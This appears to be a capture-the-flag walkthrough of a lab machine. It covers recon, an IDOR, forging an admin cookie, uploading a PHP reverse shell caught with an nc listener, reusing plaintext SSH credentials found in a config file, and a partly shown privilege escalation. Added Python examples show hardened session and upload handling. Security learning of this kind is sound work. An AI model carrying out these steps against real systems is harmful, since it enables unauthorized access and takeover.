


As usual let's start with nmap

nmap -sV -sC

Port 80 is open so let's check the website.

Open your browser and type in the url bar:

Next, let's run gobuster. First, locate the wordlist we are going to use.

locate big.txt

Let's use the wordlist:


gobuster dir -u -w /opt/useful/SecLists/Discovery/Web-Content/big.txt

Let's use Burp Suite. Open Burp Suite and click on the Proxy tab.

Turn off intercept

Click on Open Browser

In the url bar, type

Go back to Burp and click on the Target tab

We found something interesting: a directory called /cdn-cgi/login.

This directory was not picked up by our gobuster earlier.

Let's open our browser from our VM and in the url bar, type:

We do not know any credentials, but there is a link "Login as Guest".

Click on "Login as Guest"

We are logged in!

Let's click on Account

We are logged in as user guest, with access ID 2233.

Look at the url bar:

What if we were to change &id=2 into &id=1?

Let's try: change the id at the end of the url and press enter.

Now we can see there is another user called admin, with access ID 34322.

We were not meant to see that: the application returns any user's details just by changing the id parameter, without checking who is asking. This is a vulnerability of the target machine.

So we just learned that the user guest has an access ID of 2233 and the user admin has an access ID of 34322.

Now let's click on the Uploads tab on the website:

This action requires super admin rights. So if we had super admin rights, we would be able to upload files to the target machine. Interesting!

Right click on this web page and click on Inspect (Q)

Now click on the Storage tab; we can see the following cookie:

At the moment we are logged in as the user guest with access ID 2233

What if we could change the cookie so that we are now user admin with access ID 34322?

Let's try! Replace guest with admin and replace 2233 with 34322.

Now refresh the uploads page and we get the following:

We are now admin and we can upload files!
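The two weaknesses used above are worth seeing side by side with the fix. The following is an added example, not code from this writeup or from the target application: it models in plain Python the account lookup that returns whatever id is requested, and the role check that trusts the user/role values in the browser's cookie, next to a version that resolves an opaque HMAC-signed session token to a server-side record and checks ownership. The user table, access IDs and cookie values are constructed to mirror the walkthrough.

```python
"""Added example, not code from the Oopsie writeup or from the target
application: the two access-control flaws exercised above, rebuilt in plain
Python beside hardened versions.

Flaw 1 (insecure direct object reference): the account page returns whatever
record the `id` query parameter names, never asking who is calling.
Flaw 2 (client-side trust): the role is read straight out of a cookie the
browser controls (user=guest; role=2233), so editing the cookie grants admin.

All names, ids and cookie values are constructed to mirror the walkthrough.
"""
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Constructed user table; the access IDs are the ones the writeup shows.
USERS: Dict[int, dict] = {
    1: {"id": 1, "name": "admin", "access_id": 34322, "is_super_admin": True},
    2: {"id": 2, "name": "guest", "access_id": 2233, "is_super_admin": False},
}


def parse_cookie(header: str) -> Dict[str, str]:
    """Split 'k=v; k2=v2' into a dict. No validation, like the target app."""
    out = {}
    for part in header.split(";"):
        if "=" in part:
            key, value = part.strip().split("=", 1)
            out[key] = value
    return out


# ---- vulnerable pattern (what the walkthrough abuses) ----------------------
def vuln_view_account(requested_id: int) -> Optional[dict]:
    """Returns any record by id; the caller's identity is never consulted."""
    return USERS.get(requested_id)


def vuln_can_upload(cookie_header: str) -> bool:
    """Trusts the user and role the browser sends; rewriting the cookie is enough."""
    cookie = parse_cookie(cookie_header)
    return cookie.get("user") == "admin" and cookie.get("role") == "34322"


# ---- hardened pattern -------------------------------------------------------
SECRET_KEY = secrets.token_bytes(32)   # lives only on the server
SESSIONS: Dict[str, int] = {}           # opaque token -> user id, server side


def login(user_id: int) -> str:
    """Issue an opaque, HMAC-signed session token. The role stays server side."""
    token = secrets.token_hex(16)
    sig = hmac.new(SECRET_KEY, token.encode(), hashlib.sha256).hexdigest()
    SESSIONS[token] = user_id
    return f"{token}.{sig}"


def current_user(cookie_header: str) -> Optional[dict]:
    """Resolve the session cookie to a user, rejecting anything forged or edited."""
    raw = parse_cookie(cookie_header).get("session", "")
    if "." not in raw:
        return None
    token, sig = raw.rsplit(".", 1)
    expected = hmac.new(SECRET_KEY, token.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig.encode(), expected.encode()):
        return None  # signature does not match: tampered or forged
    return USERS.get(SESSIONS.get(token))


def safe_view_account(cookie_header: str, requested_id: int) -> Optional[dict]:
    """Ownership check: a non-admin may only read its own record."""
    me = current_user(cookie_header)
    if me is None:
        return None
    if not me["is_super_admin"] and requested_id != me["id"]:
        return None
    return USERS.get(requested_id)


def safe_can_upload(cookie_header: str) -> bool:
    """Authorisation comes from the server-side record, not from the cookie."""
    me = current_user(cookie_header)
    return me is not None and me["is_super_admin"]
```

The point of the hardened half is that nothing the browser can edit carries meaning on its own: the cookie is only a random handle plus a signature, the role and the ownership rule live in server state, and the account endpoint compares the requested id with the caller's own id before returning anything.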


Now let's try to upload a file.

Let's first locate the php reverse shell file and edit it

Open a new command prompt from your VM and type:

locate webshells/php

cd /usr/share/webshells/php



We are interested in php-reverse-shell.php

Let's make a copy of this file into our home directory by typing:

cp php-reverse-shell.php /home/htb-sneakymouse/oopsie.php

My username on my VM is htb-sneakymouse, which is why I used /home/htb-sneakymouse. Replace this with your own username.

Now open a brand new command prompt and type:


I can see oopsie.php has been successfully copied to my home directory.

Let's now edit oopsie.php using:

sudo nano oopsie.php

Scroll down until you see $ip and $port

We need to change both the IP and the port:

- replace it with the IP of your VM. If you don't know your IP, open a new command prompt window and type ifconfig tun0

- replace 1234 by 4444 (we will listen on port 4444 when we set up our netcat later)

Press Ctrl + X to exit

Press Y (to save)

Press enter

Now let's upload this file on the target machine. Let's go back to the upload tab on the website:

We can now click on Browse

We select our file oopsie.php and click on Open

Now click on Upload

Looks like our file oopsie.php has been uploaded successfully. However, we still don't know where it has been uploaded.

Remember earlier when we ran the gobuster command, it found a directory called /uploads.

Perhaps this is where the file has been uploaded!
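The upload step works because the server accepts a .php file and then serves /uploads straight from the web root, where PHP executes it. As an added example (not code from this writeup or from the target application), here is the server-side gate that would have refused oopsie.php: an extension allow-list, a magic-bytes check that the content matches the declared type, a scan for embedded PHP tags, and a random server-chosen filename under a directory outside the web root. The UPLOAD_DIR path and the sample files are constructed for the example.

```python
"""Added example, not part of the writeup: a server-side upload gate that
would have rejected the oopsie.php upload. Allow-list the extension, check
the file's real type by its magic bytes, refuse embedded PHP tags, and store
under a random name outside the web root so the web server never executes
anything a user uploaded. Sample inputs in the tests are constructed.
"""
import os
import secrets
from pathlib import PurePosixPath
from typing import Tuple

# Extension -> expected leading bytes (magic numbers) for the types we accept.
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
MAX_BYTES = 2 * 1024 * 1024
# Hypothetical directory outside the web root; nothing here is served directly.
UPLOAD_DIR = "/srv/uploads-private"


def check_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason-or-extension) for a client-supplied file."""
    # Keep only the basename: any directory components the client sent are dropped.
    name = PurePosixPath(filename).name
    if "." not in name:
        return False, "no extension"
    # Last extension only, lower-cased, so x.PHP and x.jpg.PhP are judged on their tail.
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed"
    if len(data) > MAX_BYTES:
        return False, "too large"
    # The declared type must match what the bytes actually are.
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match declared type"
    # Belt and braces: a valid image header followed by PHP is still refused.
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded script tag"
    return True, ext


def stored_path(ext: str) -> str:
    """Server-chosen random name; the client never controls where or as what the file lands."""
    return os.path.join(UPLOAD_DIR, f"{secrets.token_hex(16)}.{ext}")
```

The tag scan is a secondary control only: the decisive defence is that accepted files are written under a random name to a directory the web server does not execute from, and are handed back to browsers by a download handler rather than by URL.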

First let's set up our netcat listener on port 4444. From your VM, open a new command prompt window and type:

nc -lnvp 4444

Now let's try to locate and run the oopsie.php we just uploaded to our target machine. In the url bar, type:

Nothing should happen in the browser, but if you go back to your netcat (nc) command prompt, you should now have a shell:



Let's upgrade our shell using:

python3 -c 'import pty;pty.spawn("/bin/bash")'


cd home 

cd robert

cat user.txt


Congratulations! You got the user flag!

Lateral Movement

sudo -l

Unfortunately, we don't have the password

Let's explore the files on the target machine. Let's start with /var/www/html:

cd /var/www/html


cd cdn-cgi

cd login

cat db.php

Looks like we found some credentials:

username: robert

password: M3g4C0rpUs3r!

This shell is not super stable but now we have some credentials!

We know from the nmap scan at the beginning that port 22 (ssh) is open on the target machine. Let's try to ssh in using robert's credentials:

ssh robert@

The password is the one we found in db.php: M3g4C0rpUs3r!


We are in!


Privilege Escalation

locate bugtracker

cd /usr/bin


Type 1 for instance.


This time, type hello for instance.

Interesting: this time we get "/root/reports/hello: No such file or directory".


This time type:


Congratulations! You found the root flag!

